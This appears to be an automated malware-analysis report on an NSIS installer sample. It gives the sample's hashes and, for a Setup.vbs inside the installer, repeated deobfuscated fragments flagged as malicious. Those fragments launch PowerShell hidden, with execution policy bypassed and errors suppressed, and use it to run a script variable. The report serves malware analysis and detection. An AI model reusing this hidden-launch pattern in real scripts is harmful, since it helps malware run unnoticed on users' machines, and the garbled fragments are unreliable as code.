|
Hash | Hash Value |
|---|---|
| MD5 | b07f16a3b524017d20d360823c09b956
|
| Sha1 | f680fbbf487f61c9bd231e48f83a9e1c092ceb6a
|
| Sha256 | 4e5b2ae91379b8069c04c6639bb0bca5ddea0dde567bea8cb9bc9822b9cdda0d
|
| Sha384 | 9010953b26f91d9e96abf654e4f4c5e68474a177af6352ccfa9dfe573cf11165cace814c79df1bd9f8214933960847a9
|
| Sha512 | 35478fef67de169e32d7daffa3ae12a92b44d0953bf4607382816756bdd7d15ba42fb55afcc9b08d2bc01de1132a3a07f37ac7a82ccdcb9861ad1b6842d771d5
|
| SSDeep | 24576:iw+tSVHEX47Z8E/X0xZ0Id+7IsJSa/aqGK1CIOJC1+0sPiB4HM:n+ekXkQvPd+3JS1+1CQpbB4s
|
| TLSH | BF3523C1314084D7FFF395791867CF9BD4A49D5086B4A34B03E13B8AA4F28D7BB2A625
|
PeID
|
Name | Value |
|---|---|
| Info | PE Detect: PeReader OK (file layout) |
| Info | Overlay extracted: Overlay_07fdfc8a.bin (1044745 bytes) |
|
Name | Value |
|---|---|
| Deobfuscated PowerShell | [Unmanaged(ErrorExpressionAst)] " psCmd = psCmd & "-NoLogo -noprofile -NonInteractive -Command " psCmd = psCmd & "" & try { $ErrorActionPreference = "SilentlyContinue" psCmd = psCmd & psScript psCmd = psCmd & psCmd = psCmd & psScript psCmd = psCmd & } catch { } "" WshShell.Run psCmd, 0, False Set FSO = Nothing Set WshShell = Nothing WScript.Quit" |
| Deobfuscated PowerShell | " var_9 = " powershell -ExecutionPolicy "Bypass" -WindowStyle "Hidden" -NoLogo -NoProfile -NonInteractive -Command " var_9 = " "powershell" -ExecutionPolicy "Bypass" -WindowStyle "Hidden" -NoLogo -NoProfile -NonInteractive -Command "" & [Unmanaged(ErrorStatementAst)] try { $ErrorActionPreference='SilentlyContinue'; . '""" var_9 = "powershell -ExecutionPolicy Bypass -WindowStyle Hidden -NoLogo -NoProfile -NonInteractive -Command ""& { try { $ErrorActionPreference='SilentlyContinue'; . '""" & var_8 var_9 = var_9 & """'; } catch {} }""" var_5.Run var_9, 0.0, False Set var_6 = Nothing Set var_5 = Nothing WScript.quit |
| Deobfuscated PowerShell | [Unmanaged(ErrorExpressionAst)] "Bypass" -WindowStyle [Unmanaged(ErrorExpressionAst)] "Hidden" -NoLogo -noprofile -NonInteractive -Command " var_9 = " "powershell" -ExecutionPolicy "Bypass" -WindowStyle "Hidden" -NoLogo -NoProfile -NonInteractive -Command "" & [Unmanaged(ErrorStatementAst)] try { $ErrorActionPreference='SilentlyContinue'; . '""" var_9 = "powershell -ExecutionPolicy Bypass -WindowStyle Hidden -NoLogo -NoProfile -NonInteractive -Command ""& { try { $ErrorActionPreference='SilentlyContinue'; . '""" & var_8 var_9 = var_9 & """'; } catch {} }""" var_5.Run var_9, 0.0, False Set var_6 = Nothing Set var_5 = Nothing WScript.quit |
| Deobfuscated PowerShell | "" try { $ErrorActionPreference = "SilentlyContinue" & var_8 var_9 = var_9 & & var_8 var_9 = var_9 & } catch { } "" var_5.Run var_9, 0.0, False Set var_6 = Nothing Set var_5 = Nothing WScript.quit" |
| PE Layout | MemoryMapped (process dump suspected) |
| Deobfuscated PowerShell | " var_9 = " powershell -ExecutionPolicy "Bypass" -WindowStyle "Hidden" -NoLogo -NoProfile -NonInteractive -Command "" & [Unmanaged(ErrorStatementAst)] try { $ErrorActionPreference='SilentlyContinue'; . '""" var_9 = "powershell -ExecutionPolicy Bypass -WindowStyle Hidden -NoLogo -NoProfile -NonInteractive -Command ""& { try { $ErrorActionPreference='SilentlyContinue'; . '""" & var_8 var_9 = var_9 & """'; } catch {} }""" var_5.Run var_9, 0.0, False Set var_6 = Nothing Set var_5 = Nothing WScript.quit |
| Deobfuscated PowerShell | [Unmanaged(ErrorExpressionAst)] "Bypass" -WindowStyle [Unmanaged(ErrorExpressionAst)] "Hidden" -NoLogo -noprofile -NonInteractive -Command "" & [Unmanaged(ErrorStatementAst)] try { $ErrorActionPreference='SilentlyContinue'; . '""" var_9 = "powershell -ExecutionPolicy Bypass -WindowStyle Hidden -NoLogo -NoProfile -NonInteractive -Command ""& { try { $ErrorActionPreference='SilentlyContinue'; . '""" & var_8 var_9 = var_9 & """'; } catch {} }""" var_5.Run var_9, 0.0, False Set var_6 = Nothing Set var_5 = Nothing WScript.quit |
| Deobfuscated PowerShell | "" [Unmanaged(ErrorStatementAst)] try { $ErrorActionPreference='SilentlyContinue'; . '""" var_9 = "powershell -ExecutionPolicy Bypass -WindowStyle Hidden -NoLogo -NoProfile -NonInteractive -Command ""& { try { $ErrorActionPreference='SilentlyContinue'; . '""" & var_8 var_9 = var_9 & """'; } catch {} }""" var_5.Run var_9, 0.0, False Set var_6 = Nothing Set var_5 = Nothing WScript.quit |
| Deobfuscated PowerShell | & [Unmanaged(ErrorStatementAst)] try { $ErrorActionPreference='SilentlyContinue'; . ' |
|
Name | Value | Location |
|---|---|---|
| Deobfuscated PowerShell | [Unmanaged(ErrorExpressionAst)] " psCmd = psCmd & "-NoLogo -noprofile -NonInteractive -Command " psCmd = psCmd & "" & try { $ErrorActionPreference = "SilentlyContinue" psCmd = psCmd & psScript psCmd = psCmd & psCmd = psCmd & psScript psCmd = psCmd & } catch { } "" WshShell.Run psCmd, 0, False Set FSO = Nothing Set WshShell = Nothing WScript.Quit" Malicious |
b07f16a3b524017d20d360823c09b956 > [NSIS Installer] @ #0000D808 > Setup.vbs > [PowerShell Command] |
| Deobfuscated PowerShell | " var_9 = " powershell -ExecutionPolicy "Bypass" -WindowStyle "Hidden" -NoLogo -NoProfile -NonInteractive -Command " var_9 = " "powershell" -ExecutionPolicy "Bypass" -WindowStyle "Hidden" -NoLogo -NoProfile -NonInteractive -Command "" & [Unmanaged(ErrorStatementAst)] try { $ErrorActionPreference='SilentlyContinue'; . '""" var_9 = "powershell -ExecutionPolicy Bypass -WindowStyle Hidden -NoLogo -NoProfile -NonInteractive -Command ""& { try { $ErrorActionPreference='SilentlyContinue'; . '""" & var_8 var_9 = var_9 & """'; } catch {} }""" var_5.Run var_9, 0.0, False Set var_6 = Nothing Set var_5 = Nothing WScript.quit Malicious |
b07f16a3b524017d20d360823c09b956 > [NSIS Installer] @ #0000D808 > Setup.vbs > Setup.vbs.deobfuscated.vbs > [PowerShell Command] |
| Deobfuscated PowerShell | [Unmanaged(ErrorExpressionAst)] "Bypass" -WindowStyle [Unmanaged(ErrorExpressionAst)] "Hidden" -NoLogo -noprofile -NonInteractive -Command " var_9 = " "powershell" -ExecutionPolicy "Bypass" -WindowStyle "Hidden" -NoLogo -NoProfile -NonInteractive -Command "" & [Unmanaged(ErrorStatementAst)] try { $ErrorActionPreference='SilentlyContinue'; . '""" var_9 = "powershell -ExecutionPolicy Bypass -WindowStyle Hidden -NoLogo -NoProfile -NonInteractive -Command ""& { try { $ErrorActionPreference='SilentlyContinue'; . '""" & var_8 var_9 = var_9 & """'; } catch {} }""" var_5.Run var_9, 0.0, False Set var_6 = Nothing Set var_5 = Nothing WScript.quit Malicious |
b07f16a3b524017d20d360823c09b956 > [NSIS Installer] @ #0000D808 > Setup.vbs > Setup.vbs.deobfuscated.vbs > [PowerShell Command] > [Deobfuscated PS] > [PowerShell Command] |
| Deobfuscated PowerShell | "" try { $ErrorActionPreference = "SilentlyContinue" & var_8 var_9 = var_9 & & var_8 var_9 = var_9 & } catch { } "" var_5.Run var_9, 0.0, False Set var_6 = Nothing Set var_5 = Nothing WScript.quit" Malicious |
b07f16a3b524017d20d360823c09b956 > [NSIS Installer] @ #0000D808 > Setup.vbs > Setup.vbs.deobfuscated.vbs > [PowerShell Command] > [Deobfuscated PS] > [PowerShell Command] > [PowerShell Command] |
| PE Layout | MemoryMapped (process dump suspected) |
b07f16a3b524017d20d360823c09b956 > [NSIS Installer] @ #0000D808 > kHyhuRdlc5Xs.part-jadoo |
| Deobfuscated PowerShell | " var_9 = " powershell -ExecutionPolicy "Bypass" -WindowStyle "Hidden" -NoLogo -NoProfile -NonInteractive -Command "" & [Unmanaged(ErrorStatementAst)] try { $ErrorActionPreference='SilentlyContinue'; . '""" var_9 = "powershell -ExecutionPolicy Bypass -WindowStyle Hidden -NoLogo -NoProfile -NonInteractive -Command ""& { try { $ErrorActionPreference='SilentlyContinue'; . '""" & var_8 var_9 = var_9 & """'; } catch {} }""" var_5.Run var_9, 0.0, False Set var_6 = Nothing Set var_5 = Nothing WScript.quit Malicious |
b07f16a3b524017d20d360823c09b956 > [NSIS Installer] @ #0000D808 > Setup.vbs > Setup.vbs.deobfuscated.vbs > [PowerShell Command] > [PowerShell Command] |
| Deobfuscated PowerShell | [Unmanaged(ErrorExpressionAst)] "Bypass" -WindowStyle [Unmanaged(ErrorExpressionAst)] "Hidden" -NoLogo -noprofile -NonInteractive -Command "" & [Unmanaged(ErrorStatementAst)] try { $ErrorActionPreference='SilentlyContinue'; . '""" var_9 = "powershell -ExecutionPolicy Bypass -WindowStyle Hidden -NoLogo -NoProfile -NonInteractive -Command ""& { try { $ErrorActionPreference='SilentlyContinue'; . '""" & var_8 var_9 = var_9 & """'; } catch {} }""" var_5.Run var_9, 0.0, False Set var_6 = Nothing Set var_5 = Nothing WScript.quit Malicious |
b07f16a3b524017d20d360823c09b956 > [NSIS Installer] @ #0000D808 > Setup.vbs > Setup.vbs.deobfuscated.vbs > [PowerShell Command] > [PowerShell Command] > [Deobfuscated PS] > [PowerShell Command] |
| Deobfuscated PowerShell | "" [Unmanaged(ErrorStatementAst)] try { $ErrorActionPreference='SilentlyContinue'; . '""" var_9 = "powershell -ExecutionPolicy Bypass -WindowStyle Hidden -NoLogo -NoProfile -NonInteractive -Command ""& { try { $ErrorActionPreference='SilentlyContinue'; . '""" & var_8 var_9 = var_9 & """'; } catch {} }""" var_5.Run var_9, 0.0, False Set var_6 = Nothing Set var_5 = Nothing WScript.quit Malicious |
b07f16a3b524017d20d360823c09b956 > [NSIS Installer] @ #0000D808 > Setup.vbs > Setup.vbs.deobfuscated.vbs > [PowerShell Command] > [PowerShell Command] > [PowerShell Command] |
| Deobfuscated PowerShell | & [Unmanaged(ErrorStatementAst)] try { $ErrorActionPreference='SilentlyContinue'; . ' Malicious |
b07f16a3b524017d20d360823c09b956 > [NSIS Installer] @ #0000D808 > Setup.vbs > Setup.vbs.deobfuscated.vbs > [Command #2] > [PowerShell Command] |